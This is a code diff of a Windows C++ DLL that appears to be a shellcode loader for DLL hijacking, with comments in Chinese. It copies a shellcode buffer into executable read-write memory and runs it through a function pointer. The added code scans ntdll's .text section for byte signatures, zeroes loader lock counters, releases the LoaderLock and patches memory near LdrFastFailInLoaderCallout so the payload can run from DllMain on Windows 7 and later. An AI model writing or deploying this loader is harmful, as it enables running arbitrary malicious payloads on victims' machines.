1 | 1 | | #include <Windows.h> |
| 2 | + | #include <stdio.h> |
2 | 3 | | |
3 | 4 | | #include "export.hpp" |
4 | 5 | | |
| skipped 7 lines |
12 | 13 | | LPVOID shellcode = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, 0x40); |
13 | 14 | | |
14 | 15 | | memcpy(shellcode, buf, sizeof(buf)); |
15 | | - | |
| 16 | + | printf("%x \n", shellcode); |
16 | 17 | | void(*func)(); |
17 | 18 | | func = (void(*)())shellcode; |
18 | 19 | | func(); |
| skipped 180 lines |
199 | 200 | | return 0; |
200 | 201 | | } |
201 | 202 | | |
| 203 | + | BYTE* readSectionData(BYTE* buffer, PDWORD rdataLength, char* secName) { |
| 204 | + | PIMAGE_DOS_HEADER dosHeader = reinterpret_cast<PIMAGE_DOS_HEADER>(buffer); |
| 205 | + | if (dosHeader->e_magic != IMAGE_DOS_SIGNATURE) { |
| 206 | + | return 0; |
| 207 | + | } |
| 208 | + | |
| 209 | + | PIMAGE_NT_HEADERS ntHeaders = reinterpret_cast<PIMAGE_NT_HEADERS>(reinterpret_cast<BYTE*>(buffer) + dosHeader->e_lfanew); |
| 210 | + | if (ntHeaders->Signature != IMAGE_NT_SIGNATURE) { |
| 211 | + | return 0; |
| 212 | + | } |
| 213 | + | |
| 214 | + | PIMAGE_SECTION_HEADER sectionHeader = IMAGE_FIRST_SECTION(ntHeaders); |
| 215 | + | for (int i = 0; i < ntHeaders->FileHeader.NumberOfSections; ++i) { |
| 216 | + | if (strcmp(secName, (char*)sectionHeader[i].Name) == 0) { |
| 217 | + | *rdataLength = sectionHeader[i].Misc.VirtualSize; |
| 218 | + | return reinterpret_cast<BYTE*>(buffer) + sectionHeader[i].VirtualAddress; |
| 219 | + | } |
| 220 | + | } |
| 221 | + | |
| 222 | + | return 0; |
| 223 | + | } |
| 224 | + | |
202 | 225 | | size_t GetSkipFileAPIBrokering(VOID) |
203 | 226 | | { |
204 | 227 | | #if defined(_WIN64) |
| skipped 4 lines |
209 | 232 | | } |
210 | 233 | | |
211 | 234 | | #ifdef _WIN64 |
212 | | - | unsigned char lock_count_flag[] = { 0x66, 0x21, 0x88, 0xEE, 0x17, 0x00, 0x00 }; |
| 235 | + | unsigned char lock_count_flag[] = {0x66, 0x21, 0x88, 0xEE, 0x17, 0x00, 0x00}; |
| 236 | + | unsigned char win7_lock_count_flag[] = {0xF0, 0x44, 0x0F, 0xB1, 0x35}; |
213 | 237 | | #else |
214 | 238 | | unsigned char lock_count_flag[] = {0x66, 0x21, 0x88, 0xCA, 0x0F, 0x00, 0x00, 0xE8}; |
| 239 | + | unsigned char win7_lock_count_flag[] = {0xC7, 0x45, 0xFC, 0xFE, 0xFF, 0xFF, 0xFF, 0xBB}; |
215 | 240 | | #endif |
216 | 241 | | |
217 | 242 | | VOID UNLOOK() |
218 | 243 | | { |
219 | 244 | | HMODULE base = GetModuleHandleA("ntdll.dll"); |
220 | | - | PIMAGE_DOS_HEADER pDH = (PIMAGE_DOS_HEADER)base; |
221 | | - | DWORD size_of_img; |
222 | | - | |
223 | | - | if (*(PWORD)((size_t)pDH + pDH->e_lfanew + 0x18) == IMAGE_NT_OPTIONAL_HDR32_MAGIC){ |
224 | | - | PIMAGE_NT_HEADERS32 pNtH32 = PIMAGE_NT_HEADERS32((size_t)pDH + pDH->e_lfanew); |
225 | | - | PIMAGE_OPTIONAL_HEADER32 pOH32 = &pNtH32->OptionalHeader; |
226 | | - | |
227 | | - | size_of_img = pOH32->SizeOfImage; |
228 | | - | } |
229 | | - | else { |
230 | | - | PIMAGE_NT_HEADERS64 pNtH64 = PIMAGE_NT_HEADERS64((size_t)pDH + pDH->e_lfanew); |
231 | | - | PIMAGE_OPTIONAL_HEADER64 pOH64 = &pNtH64->OptionalHeader; |
232 | | - | |
233 | | - | size_of_img = pOH64->SizeOfImage; |
234 | | - | } |
| 245 | + | DWORD rdataLength; |
| 246 | + | BYTE* textData = readSectionData((BYTE*)base, &rdataLength, ".text"); |
235 | 247 | | |
236 | 248 | | //适用于win7以上的系统,需要格外修改值 |
237 | | - | size_t addr = memFind((BYTE*)base, lock_count_flag, (size_t)base + size_of_img, sizeof(lock_count_flag)); |
238 | | - | Sleep(1); |
| 249 | + | size_t addr = memFind(textData, lock_count_flag, (size_t)textData + rdataLength, sizeof(lock_count_flag)); |
| 250 | + | |
239 | 251 | | if (addr != 0) |
240 | 252 | | { |
241 | 253 | | #ifdef _WIN64 |
242 | 254 | | addr = (size_t)addr + 0x15; |
243 | 255 | | addr = addr + 5 + *(PDWORD)addr; |
244 | | - | *(PDWORD)addr = (*(PDWORD)addr) & 0; |
245 | 256 | | #else |
246 | 257 | | addr = (size_t)addr + 0xe; |
247 | 258 | | addr = *(PDWORD)addr; |
248 | | - | *(PDWORD)addr = (*(PDWORD)addr) & 0; |
249 | 259 | | #endif |
| 260 | + | * (PDWORD)addr = (*(PDWORD)addr) & 0; |
250 | 261 | | |
251 | 262 | | size_t skipFileAPIBrokeringAddr = GetSkipFileAPIBrokering(); |
252 | 263 | | (*(PWORD)skipFileAPIBrokeringAddr) = (*(PWORD)skipFileAPIBrokeringAddr) & 0xEFFF; |
| skipped 11 lines |
264 | 275 | | RtlLeaveCriticalSection = (RTLLEAVECRITICALSECTION)GetProcAddress((HMODULE)hModule, "RtlLeaveCriticalSection"); |
265 | 276 | | |
266 | 277 | | RtlLeaveCriticalSection((PRTL_CRITICAL_SECTION)Peb->LoaderLock); |
| 278 | + | |
| 279 | + | //win7 和 08以下系统没有LdrFastFailInLoaderCallout导出函数 |
| 280 | + | size_t hookAddr = (size_t)GetProcAddress((HMODULE)hModule, "LdrFastFailInLoaderCallout"); |
| 281 | + | |
| 282 | + | if (hookAddr > 0) { |
| 283 | + | #ifdef _WIN64 |
| 284 | + | hookAddr = hookAddr + 0x18 + 5 + *(PDWORD)(hookAddr + 0x18); |
| 285 | + | #else |
| 286 | + | hookAddr = *(PDWORD)(hookAddr + 0x13); |
| 287 | + | #endif |
| 288 | + | *(PDWORD)hookAddr = 2; |
| 289 | + | } |
| 290 | + | |
| 291 | + | addr = memFind(textData, win7_lock_count_flag, (size_t)textData + rdataLength, sizeof(win7_lock_count_flag)); |
| 292 | + | Sleep(1); |
| 293 | + | if (addr != 0) |
| 294 | + | { |
| 295 | + | #ifdef _WIN64 |
| 296 | + | hookAddr = addr + 0x5 + 4 + *(PDWORD)(addr + 0x5); |
| 297 | + | #else |
| 298 | + | hookAddr = *(PDWORD)((size_t)addr + 0x8); |
| 299 | + | #endif |
| 300 | + | *(PDWORD)hookAddr = 2; |
| 301 | + | } |
267 | 302 | | } |
268 | 303 | | |
269 | 304 | | BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) |
| skipped 11 lines |